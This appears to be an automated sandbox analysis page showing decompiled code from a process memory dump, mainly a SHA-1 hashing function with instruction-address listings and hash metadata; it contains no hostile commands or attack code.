							__eflags =  *((intOrPtr*)(_t663 + 0x4c58)) -  *((intOrPtr*)(_t663 + 0x4c48));
							if( *((intOrPtr*)(_t663 + 0x4c58)) >  *((intOrPtr*)(_t663 + 0x4c48))) {
								goto L152;
							}
							goto L21;
						}
					}
				}
				 *((char*)(_t654 + 0x2c)) = 1;
				_push(_t654 + 0x30);
				_push(_t654 + 0x18);
				_push(_t654 + 4);
				if(E0027397F(__ecx) != 0) {
					goto L3;
				}
				goto L2;
			}

0x00276ce0
0x00276ce4
0x00276cea
0x00276d13
0x00276d16
0x00276d1b
0x00276d1e
0x00276d05
0x00276d05
0x00000000
0x00276d20
0x00276d2b
0x00276d2e
0x00276d31
0x00276d35
0x00276d39
0x00276d3d
0x00276d3f
0x00276d41
0x00276d41
0x00276d45
0x00276d52
0x00276d52
0x00276d58
0x00276d5b
0x00276d5d
0x00276d61
0x00000000
0x00000000
0x00276d63
0x00276d63
0x00276d65
0x002772f0
0x002772f0
0x002772f2
0x00000000
0x002772f3
0x00276d6b
0x00276d79
0x00276d79
0x00276d7b
0x00276d8a
0x00276d8a
0x00276d90
0x0027763f
0x0027763f
0x00000000
0x0027763f
0x00000000
0x00276d90
0x00276d7d
0x00276d84
0x00000000
0x00000000
0x00000000
0x00276d84
0x00276d70
0x00276d73
0x00000000
0x00000000
0x00000000
0x00276d96
0x00276d96
0x00276da3
0x00276da8
0x00276ddc
0x00276ddc
0x00276de1
0x00276de8
0x00276dee
0x00276df4
0x00276df8
0x00276e32
0x00276e33
0x00276e34
0x00276e36
0x00276e4f
0x00276e52
0x00276e59
0x00276e5c
0x00276e5f
0x00276e68
0x00276e71
0x00276e73
0x00276e76
0x00276e78
0x00276e78
0x00276e7a
0x00276e82
0x00276e85
0x00276e8a
0x00276e8c
0x00276ea5
0x00276eab
0x002772c7
0x002772c9
0x002772fc
0x00277302
0x0027741e
0x0027741e
0x00277427
0x0027742a
0x0027742c
0x00277430
0x0027743f
0x0027743f
0x00277442
0x00277447
0x0027744e
0x00277454
0x0027745a
0x00277461
0x0027748f
0x00277490
0x00277491
0x00277493
0x002774af
0x002774b2
0x002774b9
0x002774bc
0x002774bf
0x002774cb
0x002774d7
0x002774d9
0x002774df
0x002774e1
0x002774e1
0x002774e3
0x002774eb
0x002774eb
0x002774ee
0x002774f1
0x00277502
0x00277505
0x00277505
0x002774f3
0x002774f3
0x002774f3
0x00277507
0x0027750a
0x0027750c
0x00277511
0x00277518
0x00277520
0x00277522
0x00277529
0x0027752c
0x0027752c
0x0027752f
0x0027752f
0x00277532
0x0027753d
0x00277541
0x00277546
0x00277549
0x0027754b
0x002775ff
0x002775ff
0x00277602
0x00277604
0x00000000
0x00000000
0x0027760a
0x00277610
0x00277616
0x0027761b
0x0027761f
0x00277625
0x0027762e
0x00277631
0x00277631
0x00277631
0x00277636
0x00277636
0x00276e9d
0x00276e9d
0x00000000
0x00277551
0x00277551
0x00277553
0x00000000
0x00000000
0x00277559
0x0027755f
0x00277561
0x00277567
0x0027756b
0x0027756e
0x00277572
0x002775c4
0x002775c7
0x002771fb
0x002771fb
0x002771fe
0x00277200
0x00276d4a
0x00276d4e
0x00276d4e
0x00276d52
0x00276d52
0x00276d58
0x00276d5b
0x00276d5d
0x00276d61
0x00000000
0x00000000
0x00000000
0x00276d61
0x00276d52
0x00277209
0x0027720b
0x0027720e
0x00277211
0x00000000
0x00000000
0x0027721a
0x0027721d
0x00277220
0x00277223
0x00000000
0x00000000
0x0027722c
0x0027722f
0x00277232
0x00277235
0x00000000
0x00000000
0x0027723e
0x00277241
0x00277244
0x00277247
0x00000000
0x00000000
0x00277250
0x00277253
0x00277256
0x00277259
0x00000000
0x00000000
0x00277262
0x00277265
0x00277269
0x0027726c
0x0027726f
0x00277278
0x0027727b
0x0027727b
0x00000000
0x0027726f
0x002775cf
0x002775cf
0x002775d2
0x002775d6
0x002775d8
0x002775dc
0x002775e1
0x002775e5
0x002775e8
0x002775eb
0x002775ee
0x002775f1
0x002775f5
0x002775f5
0x002775f5
0x002771f7
0x002771f7
0x00000000
0x002771f7
0x00277574
0x00277577
0x00000000
0x00000000
0x0027757f
0x0027757f
0x00277582
0x00277585
0x00277588
0x0027758d
0x00277593
0x00277599
0x0027759f
0x002775a5
0x002775ab
0x002775ae
0x002775b1
0x002775b4
0x002775b7
0x002775ba
0x002775ba
0x002775ba
0x00000000
0x002775bf
0x0027754b
0x0027749b
0x0027749e
0x0027749e
0x002774a0
0x00000000
0x00000000
0x002774a2
0x002774a3
0x002774a6
0x002774a9
0x00000000
0x00000000
0x00000000
0x002774ab
0x002774ad
0x00000000
0x002774ad
0x00277465
0x00277468
0x00277472
0x0027747a
0x00277480
0x00277483
0x00000000
0x00000000
0x00000000
0x00000000
0x00277432
0x00277432
0x00277435
0x00277437
0x0027743a
0x0027743a
0x0027743a
0x00000000
0x00277432
0x00277308
0x0027730b
0x0027730f
0x00277311
0x00276e27
0x00276e27
0x00000000
0x00276e27
0x00277317
0x0027731a
0x0027731f
0x00277321
0x0027732b
0x00277330
0x00277332
0x002773e2
0x002773e2
0x002773e5
0x002773e7
0x00000000
0x00000000
0x002773ed
0x002773f3
0x002773f9
0x002773fe
0x00277402
0x00277408
0x00277411
0x00277414
0x00277414
0x00277414
0x00000000
0x00277419
0x00277338
0x0027733a
0x00000000
0x00000000
0x00277340
0x00277346
0x00277348
0x0027734e
0x00277352
0x00277355
0x00277359
0x002773ab
0x002773ae
0x00000000
0x00000000
0x002773b6
0x002773b6
0x002773b9
0x002773bb
0x002773bf
0x002773c4
0x002773c8
0x002773cb
0x002773ce
0x002773d1
0x002773d4
0x002773d8
0x002773d8
0x002773d8
0x00000000
0x002773dd
0x0027735b
0x0027735e
0x00000000
0x00000000
0x00277366
0x00277366
0x00277369
0x0027736c
0x0027736f
0x00277374
0x0027737a
0x00277380
0x00277386
0x0027738c
0x00277392
0x00277395
0x00277398
0x0027739b
0x0027739e
0x002773a1
0x002773a1
0x002773a1
0x00000000
0x002773a6
0x002772cf
0x002772d3
0x002772d8
0x002772da
0x00000000
0x00000000
0x002772e3
0x002772e8
0x002772ea
0x00000000
0x00000000
0x00000000
0x002772ea
0x00276eb1
0x00276eb7
0x00276eba
0x00276ecb
0x00276ece
0x00276ece
0x00276ebc
0x00276ebc
0x00276ebc
0x00276ed0
0x00276ed3
0x00276ed5
0x00276eff
0x00276ed7
0x00276ed9
0x00276ee0
0x00276ee8
0x00276eea
0x00276eec
0x00276ef4
0x00276efa
0x00276efa
0x00276f04
0x00276f0b
0x00276f11
0x00276f17
0x00276f1e
0x00276f4c
0x00276f4d
0x00276f4e
0x00276f50
0x00276f6c
0x00276f6f
0x00276f76
0x00276f79
0x00276f7c
0x00276f88
0x00276f94
0x00276f96
0x00276f9c
0x00276f9e
0x00276f9e
0x00276fa0
0x00000000
0x00276fa0
0x00276f58
0x00276f5b
0x00276f5b
0x00276f5d
0x00000000
0x00000000
0x00276f5f
0x00276f60
0x00276f63
0x00276f66
0x00000000
0x00000000
0x00000000
0x00276f68
0x00276f6a
0x00000000
0x00276f20
0x00276f22
0x00276f25
0x00276f2f
0x00276f37
0x00276f3d
0x00276f40
0x00276fa8
0x00276fa8
0x00276fab
0x00276fae
0x00276fbe
0x00276fc1
0x00276fc1
0x00276fb0
0x00276fb0
0x00276fb0
0x00276fc3
0x00276fc7
0x00276fca
0x00276fce
0x00276fd0
0x00276fd4
0x00276fd6
0x00277107
0x00277107
0x0027710d
0x0027710f
0x00277110
0x00277116
0x00277118
0x00277119
0x0027711f
0x00277121
0x00277121
0x00277121
0x0027711f
0x00277116
0x00277125
0x0027712b
0x00277131
0x00277134
0x00277137
0x00277142
0x00277144
0x00277149
0x0027714c
0x00277150
0x00277152
0x00277283
0x00277283
0x00277287
0x0027728a
0x0027728c
0x00000000
0x00000000
0x00277292
0x00277298
0x0027729c
0x002772a2
0x002772a7
0x002772ab
0x002772b1
0x002772ba
0x002772bd
0x002772bd
0x002772bd
0x00000000
0x00277158
0x00277158
0x0027715a
0x00000000
0x00000000
0x00277160
0x00277166
0x00277169
0x0027716f
0x00277173
0x00277176
0x0027717a
0x002771c5
0x002771c8
0x00000000
0x00000000
0x002771cc
0x002771cc
0x002771cf
0x002771d3
0x002771d5
0x002771d9
0x002771de
0x002771e2
0x002771e5
0x002771e8
0x002771eb
0x002771ee
0x002771f2
0x002771f2
0x002771f2
0x00000000
0x002771d5
0x0027717c
0x0027717f
0x00000000
0x00000000
0x00277183
0x00277183
0x00277186
0x00277189
0x0027718c
0x00277191
0x00277197
0x0027719d
0x002771a3
0x002771a9
0x002771af
0x002771b2
0x002771b5
0x002771b8
0x002771bb
0x002771be
0x002771be
0x002771be
0x00000000
0x002771c3
0x00276fdc
0x00276fdc
0x00276fdf
0x002770da
0x002770e3
0x002770ed
0x002770f1
0x002770fa
0x002770fd
0x002770fd
0x00277100
0x00277103
0x00277103
0x00000000
0x00277103
0x00276fe5
0x0027701b
0x00276fe7
0x00276fea
0x00276fef
0x00276ff7
0x00276fff
0x00277002
0x0027700a
0x00277011
0x00277016
0x00277016
0x00277020
0x00277027
0x0027702d
0x00277033
0x0027703a
0x00277068
0x00277069
0x0027706a
0x0027706e
0x00277070
0x0027708e
0x00277091
0x0027709d
0x002770a0
0x002770a4
0x002770a9
0x002770bc
0x002770be
0x002770c4
0x002770c6
0x002770c6
0x002770c8
0x00000000
0x002770c8
0x00277078
0x0027707b
0x0027707b
0x0027707d
0x00000000
0x00000000
0x0027707f
0x00277080
0x00277083
0x00277086
0x00000000
0x00000000
0x00000000
0x00277088
0x0027708a
0x00000000
0x0027703c
0x0027703e
0x00277041
0x0027704b
0x00277053
0x00277059
0x0027705c
0x002770d0
0x002770d3
0x00000000
0x002770d3
0x0027703a
0x00276fd6
0x00276f1e
0x00276e97
0x00276e9a
0x00276e9a
0x00276e9a
0x00000000
0x00276e9a
0x00276e3b
0x00276e3e
0x00276e3e
0x00276e40
0x00000000
0x00000000
0x00276e42
0x00276e43
0x00276e46
0x00276e49
0x00000000
0x00000000
0x00000000
0x00276e4b
0x00276e4d
0x00000000
0x00276e4d
0x00276dfc
0x00276dff
0x00276e09
0x00276e11
0x00276e17
0x00276e1a
0x00276e1d
0x00000000
0x00276e1d
0x00276daa
0x00276dad
0x00000000
0x00000000
0x00276db1
0x00276dbc
0x00276dc2
0x0027764b
0x0027764b
0x00000000
0x0027764b
0x00276dc8
0x00000000
0x00000000
0x00276dd0
0x00276dd6
0x00000000
0x00000000
0x00000000
0x00276dd6
0x00276d52
0x00276d1e
0x00276cef
0x00276cf3
0x00276cf7
0x00276cfb
0x00276d03
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 807f214746869600fdd18866b4149cd4aafbd92bc6957c1dafb80c3f5aedf6e6
Instruction ID: 65e380c847190ffede2c279b9ca09beefb79050fed03729038a2256d1434681d
Opcode Fuzzy Hash: 807f214746869600fdd18866b4149cd4aafbd92bc6957c1dafb80c3f5aedf6e6
Instruction Fuzzy Hash: 0C62F570628B469FC729CF28C8906B9FBE1BF55304F14C66DD8AA87742D730E965CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0026E973, Relevance: .7, Instructions: 694
COMMONCrypto

Download Yara Rule

C-Code - Quality: 70%

			E0026E973(signed int* _a4, signed int _a8, signed int _a12, signed int _a16) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int* _v20;
				signed int _v24;
				signed int _v28;
				signed int _t429;
				intOrPtr _t431;
				intOrPtr _t436;
				void* _t441;
				intOrPtr _t443;
				signed int _t446;
				void* _t448;
				signed int _t454;
				signed int _t460;
				signed int _t466;
				signed int _t474;
				signed int _t482;
				signed int _t489;
				signed int _t512;
				signed int _t519;
				signed int _t526;
				signed int _t546;
				signed int _t555;
				signed int _t564;
				signed int* _t592;
				signed int _t593;
				signed int _t595;
				signed int _t596;
				signed int* _t597;
				signed int _t598;
				signed int _t599;
				signed int _t601;
				signed int _t603;
				signed int _t604;
				signed int* _t605;
				signed int _t606;
				signed int* _t670;
				signed int* _t741;
				signed int _t752;
				signed int _t769;
				signed int _t773;
				signed int _t777;
				signed int _t781;
				signed int _t782;
				signed int _t786;
				signed int _t787;
				signed int _t791;
				signed int _t796;
				signed int _t800;
				signed int _t804;
				signed int _t806;
				signed int _t809;
				signed int _t810;
				signed int* _t811;
				signed int _t814;
				signed int _t815;
				signed int _t816;
				signed int _t820;
				signed int _t821;
				signed int _t825;
				signed int _t830;
				signed int _t834;
				signed int _t838;
				signed int* _t839;
				signed int _t841;
				signed int _t842;
				signed int _t844;
				signed int _t845;
				signed int _t847;
				signed int* _t848;
				signed int _t851;
				signed int* _t854;
				signed int _t855;
				signed int _t857;
				signed int _t858;
				signed int _t862;
				signed int _t863;
				signed int _t867;
				signed int _t871;
				signed int _t875;
				signed int _t879;
				signed int _t880;
				signed int* _t881;
				signed int _t882;
				signed int _t884;
				signed int _t885;
				signed int _t886;
				signed int _t887;
				signed int _t888;
				signed int _t890;
				signed int _t891;
				signed int _t893;
				signed int _t894;
				signed int _t896;
				signed int _t897;
				signed int* _t898;
				signed int _t899;
				signed int _t901;
				signed int _t902;
				signed int _t904;
				signed int _t905;

				_t906 =  &_v28;
				if(_a16 == 0) {
					_t839 = _a8;
					_v20 = _t839;
					E0027EA80(_t839, _a12, 0x40);
					_t906 =  &(( &_v28)[3]);
				} else {
					_t839 = _a12;
					_v20 = _t839;
				}
				_t848 = _a4;
				_t593 =  *_t848;
				_t886 = _t848[1];
				_a12 = _t848[2];
				_a16 = _t848[3];
				_v24 = 0;
				_t429 = E00285604( *_t839);
				asm("rol edx, 0x5");
				 *_t839 = _t429;
				_t851 = _t848[4] + 0x5a827999 + ((_a16 ^ _a12) & _t886 ^ _a16) + _t593 + _t429;
				_t430 = _t839;
				asm("ror ebp, 0x2");
				_v16 = _t839;
				_a8 =  &(_t839[3]);
				do {
					_t431 = E00285604(_t430[1]);
					asm("rol edx, 0x5");
					 *((intOrPtr*)(_v16 + 4)) = _t431;
					asm("ror ebx, 0x2");
					_a16 = _a16 + 0x5a827999 + ((_a12 ^ _t886) & _t593 ^ _a12) + _t851 + _t431;
					_t436 = E00285604( *((intOrPtr*)(_a8 - 4)));
					asm("rol edx, 0x5");
					 *((intOrPtr*)(_a8 - 4)) = _t436;
					asm("ror esi, 0x2");
					_a12 = _a12 + 0x5a827999 + ((_t886 ^ _t593) & _t851 ^ _t886) + _a16 + _t436;
					_t441 = E00285604( *_a8);
					asm("rol edx, 0x5");
					 *_a8 = _t441;
					asm("ror dword [esp+0x48], 0x2");
					_t886 = _t886 + ((_t851 ^ _t593) & _a16 ^ _t593) + _a12 + 0x5a827999 + _t441;
					_t443 = E00285604( *((intOrPtr*)(_a8 + 4)));
					_a8 = _a8 + 0x14;
					asm("rol edx, 0x5");
					 *((intOrPtr*)(_a8 + 4)) = _t443;
					_t446 = _v24 + 5;
					asm("ror dword [esp+0x48], 0x2");
					_v24 = _t446;
					_t593 = _t593 + ((_t851 ^ _a16) & _a12 ^ _t851) + _t886 + _t443 + 0x5a827999;
					_v16 =  &(_t839[_t446]);
					_t448 = E00285604(_t839[_t446]);
					_t906 =  &(_t906[5]);
					asm("rol edx, 0x5");
					 *_v16 = _t448;
					_t430 = _v16;
					asm("ror ebp, 0x2");
					_t851 = _t851 + 0x5a827999 + ((_a16 ^ _a12) & _t886 ^ _a16) + _t593 + _t448;
				} while (_v24 != 0xf);
				_t769 = _t839[0xd] ^ _t839[8] ^ _t839[2] ^  *_t839;
				asm("rol edx, 1");
				asm("rol ecx, 0x5");
				 *_t839 = _t769;
				_t454 = ((_a12 ^ _t886) & _t593 ^ _a12) + _t851 + _t769 + _a16 + 0x5a827999;
				_t773 = _t839[0xe] ^ _t839[9] ^ _t839[3] ^ _t839[1];
				_a16 = _t454;
				asm("rol edx, 1");
				asm("rol ecx, 0x5");
				asm("ror ebx, 0x2");
				_t839[1] = _t773;
				_t777 = _t839[0xf] ^ _t839[0xa] ^ _t839[4] ^ _t839[2];
				_t460 = ((_t886 ^ _t593) & _t851 ^ _t886) + _t454 + _t773 + _a12 + 0x5a827999;
				asm("ror esi, 0x2");
				_a8 = _t460;
				asm("rol edx, 1");
				asm("rol ecx, 0x5");
				_t839[2] = _t777;
				_t466 = ((_t851 ^ _t593) & _a16 ^ _t593) + _t460 + 0x5a827999 + _t777 + _t886;
				_t887 = _a16;
				_t781 = _t839[0xb] ^ _t839[5] ^ _t839[3] ^  *_t839;
				_v28 = _t466;
				asm("ror ebp, 0x2");
				_a16 = _t887;
				_t888 = _a8;
				asm("rol edx, 1");
				asm("rol ecx, 0x5");
				_t839[3] = _t781;
				asm("ror ebp, 0x2");
				_t782 = 0x11;
				_a12 = ((_t851 ^ _t887) & _t888 ^ _t851) + 0x5a827999 + _t466 + _t781 + _t593;
				_a8 = _t888;
				_v16 = _t782;
				do {
					_t89 = _t782 + 5; // 0x16
					_t474 = _t89;
					_v8 = _t474;
					_t91 = _t782 - 5; // 0xc
					_t92 = _t782 + 3; // 0x14
					_t890 = _t92 & 0x0000000f;
					_t595 = _t474 & 0x0000000f;
					_v12 = _t890;
					_t786 = _t839[_t91 & 0x0000000f] ^ _t839[_t782 & 0x0000000f] ^ _t839[_t595] ^ _t839[_t890];
					asm("rol edx, 1");
					_t839[_t890] = _t786;
					_t891 = _v28;
					asm("rol ecx, 0x5");
					asm("ror ebp, 0x2");
					_v28 = _t891;
					_t482 = _v16;
					_v24 = _t851 + (_a16 ^ _a8 ^ _t891) + 0x6ed9eba1 + _a12 + _t786;
					_t854 = _v20;
					_t787 = 0xf;
					_t841 = _t482 + 0x00000006 & _t787;
					_t893 = _t482 + 0x00000004 & _t787;
					_t791 =  *(_t854 + (_t482 - 0x00000004 & _t787) * 4) ^  *(_t854 + (_t482 + 0x00000001 & _t787) * 4) ^  *(_t854 + _t893 * 4) ^  *(_t854 + _t841 * 4);
					asm("rol edx, 1");
					 *(_t854 + _t893 * 4) = _t791;
					_t855 = _a12;
					asm("rol ecx, 0x5");
					asm("ror esi, 0x2");
					_a12 = _t855;
					_t489 = _v16;
					_a16 = _a16 + 0x6ed9eba1 + (_a8 ^ _v28 ^ _t855) + _v24 + _t791;
					_t857 = _t489 + 0x00000007 & 0x0000000f;
					_t670 = _v20;
					_t796 = _v20[_t489 - 0x00000003 & 0x0000000f] ^  *(_t670 + (_t489 + 0x00000002 & 0x0000000f) * 4) ^  *(_t670 + _t595 * 4) ^  *(_t670 + _t857 * 4);
					asm("rol edx, 1");
					 *(_t670 + _t595 * 4) = _t796;
					_t596 = _v24;
					asm("rol ecx, 0x5");
					asm("ror ebx, 0x2");
					_v24 = _t596;
					_t597 = _v20;
					_a8 = _a8 + 0x6ed9eba1 + (_t596 ^ _v28 ^ _a12) + _a16 + _t796;
					asm("rol ecx, 0x5");
					_t800 =  *(_t597 + (_v16 - 0x00000008 & 0x0000000f) * 4) ^  *(_t597 + (_v16 + 0xfffffffe & 0x0000000f) * 4) ^  *(_t597 + _t841 * 4) ^  *(_t597 + _v12 * 4);
					asm("rol edx, 1");
					 *(_t597 + _t841 * 4) = _t800;
					_t598 = _a16;
					_t839 = _v20;
					asm("ror ebx, 0x2");
					_a16 = _t598;
					_v28 = _v28 + 0x6ed9eba1 + (_v24 ^ _t598 ^ _a12) + _a8 + _t800;
					_t804 = _t839[_v16 - 0x00000007 & 0x0000000f] ^ _t839[_v16 - 0x00000001 & 0x0000000f] ^ _t839[_t893] ^ _t839[_t857];
					_t894 = _a8;
					asm("rol edx, 1");
					_t839[_t857] = _t804;
					_t851 = _v24;
					asm("rol ecx, 0x5");
					_t782 = _v8;
					asm("ror ebp, 0x2");
					_a8 = _t894;
					_a12 = _a12 + 0x6ed9eba1 + (_t851 ^ _t598 ^ _t894) + _v28 + _t804;
					_v16 = _t782;
				} while (_t782 + 3 <= 0x23);
				_t858 = 0x25;
				_v16 = _t858;
				while(1) {
					_t199 = _t858 + 5; // 0x2a
					_t512 = _t199;
					_t200 = _t858 - 5; // 0x20
					_v4 = _t512;
					_t202 = _t858 + 3; // 0x28
					_t806 = _t202 & 0x0000000f;
					_v8 = _t806;
					_t896 = _t512 & 0x0000000f;
					_t862 = _t839[_t200 & 0x0000000f] ^ _t839[_t858 & 0x0000000f] ^ _t839[_t806] ^ _t839[_t896];
					asm("rol esi, 1");
					_t599 = _v28;
					_t839[_t806] = _t862;
					asm("rol edx, 0x5");
					asm("ror ebx, 0x2");
					_t863 = 0xf;
					_v28 = _t599;
					_v24 = _a12 - 0x70e44324 + ((_a8 | _v28) & _t598 | _a8 & _t599) + _t862 + _v24;
					_t519 = _v16;
					_t601 = _t519 + 0x00000006 & _t863;
					_t809 = _t519 + 0x00000004 & _t863;
					_v12 = _t809;
					_t867 = _t839[_t519 - 0x00000004 & _t863] ^ _t839[_t519 + 0x00000001 & _t863] ^ _t839[_t809] ^ _t839[_t601];
					asm("rol esi, 1");
					_t839[_t809] = _t867;
					_t842 = _a12;
					_t810 = _v24;
					asm("rol edx, 0x5");
					asm("ror edi, 0x2");
					_a12 = _t842;
					_t243 = _t810 - 0x70e44324; // -1894007573
					_t811 = _v20;
					_a16 = _t243 + ((_v28 | _t842) & _a8 | _v28 & _t842) + _t867 + _a16;
					_t526 = _v16;
					_t844 = _t526 + 0x00000007 & 0x0000000f;
					_t871 =  *(_t811 + (_t526 - 0x00000003 & 0x0000000f) * 4) ^  *(_t811 + (_t526 + 0x00000002 & 0x0000000f) * 4) ^  *(_t811 + _t844 * 4) ^  *(_t811 + _t896 * 4);
					asm("rol esi, 1");
					 *(_t811 + _t896 * 4) = _t871;
					_t897 = _v24;
					asm("rol edx, 0x5");
					asm("ror ebp, 0x2");
					_t814 = _a16 + 0x8f1bbcdc + ((_t897 | _a12) & _v28 | _t897 & _a12) + _t871 + _a8;
					_v24 = _t897;
					_t898 = _v20;
					_a8 = _t814;
					asm("rol edx, 0x5");
					_t875 =  *(_t898 + (_v16 - 0x00000008 & 0x0000000f) * 4) ^  *(_t898 + (_v16 + 0xfffffffe & 0x0000000f) * 4) ^  *(_t898 + _v8 * 4) ^  *(_t898 + _t601 * 4);
					asm("rol esi, 1");
					 *(_t898 + _t601 * 4) = _t875;
					_t598 = _a16;
					asm("ror ebx, 0x2");
					_a16 = _t598;
					_t815 = _t814 + ((_v24 | _t598) & _a12 | _v24 & _t598) + 0x8f1bbcdc + _t875 + _v28;
					_v28 = _t815;
					asm("rol edx, 0x5");
					_t879 =  *(_t898 + (_v16 - 0x00000007 & 0x0000000f) * 4) ^  *(_t898 + (_v16 - 0x00000001 & 0x0000000f) * 4) ^  *(_t898 + _t844 * 4) ^  *(_t898 + _v12 * 4);
					asm("rol esi, 1");
					 *(_t898 + _t844 * 4) = _t879;
					_t899 = _a8;
					_t845 = _v24;
					asm("ror ebp, 0x2");
					_a8 = _t899;
					_t858 = _v4;
					_a12 = _t815 - 0x70e44324 + ((_t598 | _t899) & _t845 | _t598 & _t899) + _t879 + _a12;
					_v16 = _t858;
					if(_t858 + 3 > 0x37) {
						break;
					}
					_t839 = _v20;
				}
				_t816 = 0x39;
				_v16 = _t816;
				do {
					_t310 = _t816 + 5; // 0x3e
					_t546 = _t310;
					_v8 = _t546;
					_t312 = _t816 + 3; // 0x3c
					_t313 = _t816 - 5; // 0x34
					_t880 = 0xf;
					_t901 = _t312 & _t880;
					_t603 = _t546 & _t880;
					_t881 = _v20;
					_v4 = _t901;
					_t820 =  *(_t881 + (_t313 & _t880) * 4) ^  *(_t881 + (_t816 & _t880) * 4) ^  *(_t881 + _t603 * 4) ^  *(_t881 + _t901 * 4);
					asm("rol edx, 1");
					 *(_t881 + _t901 * 4) = _t820;
					_t902 = _v28;
					asm("rol ecx, 0x5");
					asm("ror ebp, 0x2");
					_v28 = _t902;
					_v24 = (_a16 ^ _a8 ^ _t902) + _t820 + _t845 + _a12 + 0xca62c1d6;
					_t555 = _v16;
					_t821 = 0xf;
					_t847 = _t555 + 0x00000006 & _t821;
					_t904 = _t555 + 0x00000004 & _t821;
					_t825 =  *(_t881 + (_t555 - 0x00000004 & _t821) * 4) ^  *(_t881 + (_t555 + 0x00000001 & _t821) * 4) ^  *(_t881 + _t904 * 4) ^  *(_t881 + _t847 * 4);
					asm("rol edx, 1");
					 *(_t881 + _t904 * 4) = _t825;
					_t882 = _a12;
					asm("rol ecx, 0x5");
					_a16 = (_a8 ^ _v28 ^ _t882) + _t825 + _a16 + _v24 + 0xca62c1d6;
					_t564 = _v16;
					asm("ror esi, 0x2");
					_a12 = _t882;
					_t884 = _t564 + 0x00000007 & 0x0000000f;
					_t741 = _v20;
					_t830 = _v20[_t564 - 0x00000003 & 0x0000000f] ^  *(_t741 + (_t564 + 0x00000002 & 0x0000000f) * 4) ^  *(_t741 + _t603 * 4) ^  *(_t741 + _t884 * 4);
					asm("rol edx, 1");
					 *(_t741 + _t603 * 4) = _t830;
					_t604 = _v24;
					asm("rol ecx, 0x5");
					asm("ror ebx, 0x2");
					_v24 = _t604;
					_t605 = _v20;
					_a8 = (_t604 ^ _v28 ^ _a12) + _t830 + _a8 + _a16 + 0xca62c1d6;
					asm("rol ecx, 0x5");
					_t834 = _t605[_v16 - 0x00000008 & 0x0000000f] ^ _t605[_v16 + 0xfffffffe & 0x0000000f] ^ _t605[_t847] ^ _t605[_v4];
					asm("rol edx, 1");
					_t605[_t847] = _t834;
					_t845 = _v24;
					asm("ror dword [esp+0x3c], 0x2");
					_v28 = (_t845 ^ _a16 ^ _a12) + _t834 + _v28 + _a8 + 0xca62c1d6;
					_t838 = _t605[_v16 - 0x00000007 & 0x0000000f] ^ _t605[_v16 - 0x00000001 & 0x0000000f] ^ _t605[_t904] ^ _t605[_t884];
					_t905 = _a8;
					asm("rol edx, 1");
					_t605[_t884] = _t838;
					_t606 = _a16;
					_t885 = _v28;
					asm("ror ebp, 0x2");
					_t816 = _v8;
					asm("rol ecx, 0x5");
					_a8 = _t905;
					_t752 = _t885 + 0xca62c1d6 + (_t845 ^ _t606 ^ _t905) + _t838 + _a12;
					_v16 = _t816;
					_a12 = _t752;
				} while (_t816 + 3 <= 0x4b);
				_t592 = _a4;
				_t592[1] = _t592[1] + _t885;
				_t592[2] = _t592[2] + _t905;
				_t592[3] = _t592[3] + _t606;
				 *_t592 =  *_t592 + _t752;
				_t592[4] = _t592[4] + _t845;
				return _t592;
			}

0x0026e973
0x0026e97f
0x0026e98b
0x0026e995
0x0026e99a
0x0026e99f
0x0026e981
0x0026e981
0x0026e985
0x0026e985
0x0026e9a2
0x0026e9ab
0x0026e9ad
0x0026e9b0
0x0026e9ba
0x0026e9c0
0x0026e9c4
0x0026e9dc
0x0026e9e7
0x0026e9e9
0x0026e9eb
0x0026e9f0
0x0026e9f3
0x0026e9f7
0x0026e9fb
0x0026e9fe
0x0026ea09
0x0026ea0e
0x0026ea28
0x0026ea2d
0x0026ea38
0x0026ea45
0x0026ea4a
0x0026ea5e
0x0026ea65
0x0026ea6f
0x0026ea7c
0x0026ea85
0x0026ea95
0x0026eaa1
0x0026eaa3
0x0026eaae
0x0026eab3
0x0026eab6
0x0026eaca
0x0026ead1
0x0026ead8
0x0026eae1
0x0026eae5
0x0026eae9
0x0026eaf4
0x0026eaf7
0x0026eafa
0x0026eb06
0x0026eb18
0x0026eb1b
0x0026eb1d
0x0026eb33
0x0026eb3b
0x0026eb3f
0x0026eb4a
0x0026eb5c
0x0026eb63
0x0026eb66
0x0026eb6c
0x0026eb6e
0x0026eb73
0x0026eb78
0x0026eb8e
0x0026eb97
0x0026eb99
0x0026eb9c
0x0026eba2
0x0026eba8
0x0026ebb7
0x0026ebc7
0x0026ebc9
0x0026ebcf
0x0026ebd1
0x0026ebd7
0x0026ebdc
0x0026ebe0
0x0026ebe6
0x0026ebea
0x0026ebf4
0x0026ebfb
0x0026ec00
0x0026ec01
0x0026ec05
0x0026ec09
0x0026ec0d
0x0026ec0d
0x0026ec0d
0x0026ec12
0x0026ec16
0x0026ec1e
0x0026ec24
0x0026ec27
0x0026ec2a
0x0026ec39
0x0026ec48
0x0026ec4a
0x0026ec4d
0x0026ec53
0x0026ec5d
0x0026ec62
0x0026ec68
0x0026ec6c
0x0026ec70
0x0026ec74
0x0026ec78
0x0026ec7d
0x0026ec90
0x0026ec9f
0x0026eca1
0x0026eca4
0x0026ecaa
0x0026ecaf
0x0026ecc2
0x0026ecc8
0x0026eccc
0x0026ecdc
0x0026ece5
0x0026ecef
0x0026ecf2
0x0026ecf4
0x0026ecfb
0x0026ed01
0x0026ed10
0x0026ed1d
0x0026ed23
0x0026ed2b
0x0026ed4c
0x0026ed4f
0x0026ed56
0x0026ed5a
0x0026ed5d
0x0026ed67
0x0026ed77
0x0026ed7c
0x0026ed84
0x0026ed9b
0x0026eda2
0x0026eda6
0x0026eda8
0x0026edab
0x0026edb1
0x0026edba
0x0026edca
0x0026edcf
0x0026edd6
0x0026edda
0x0026edde
0x0026ede9
0x0026edea
0x0026edf4
0x0026edf4
0x0026edf4
0x0026edf7
0x0026edfa
0x0026ee01
